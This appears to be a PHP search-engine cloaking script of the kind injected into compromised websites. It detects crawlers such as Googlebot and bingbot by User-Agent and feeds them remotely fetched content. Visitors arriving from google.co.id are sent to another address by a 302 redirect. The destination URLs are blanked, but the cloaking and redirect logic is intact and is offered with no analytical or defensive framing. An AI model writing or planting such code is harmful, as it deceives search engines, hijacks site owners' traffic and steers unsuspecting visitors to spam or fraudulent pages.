<?php 

$mangea = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
$mangea_cun = "#";

function is_bot() { 
    $user_agent = $_SERVER['HTTP_USER_AGENT']; 
    $bots = array('Googlebot', 'TelegramBot', 'bingbot', 'Google-Site-Verification', 'Google-InspectionTool', 'AhrefsBot'); 
 
    foreach ($bots as $bot) { 
        if (stripos($user_agent, $bot) !== false) { 
            return true; 
        } 
    } 
 
    return false; 
} 
 
if (is_bot()) { 
    $message = file_get_contents('#');
    echo $message; 
}

if (!empty($mangea) && (stripos($mangea, "google.co.id") !== false)) {
    header("HTTP/1.1 302 Found");
    header("Location: ".$mangea_cun);
    exit();
}
?>
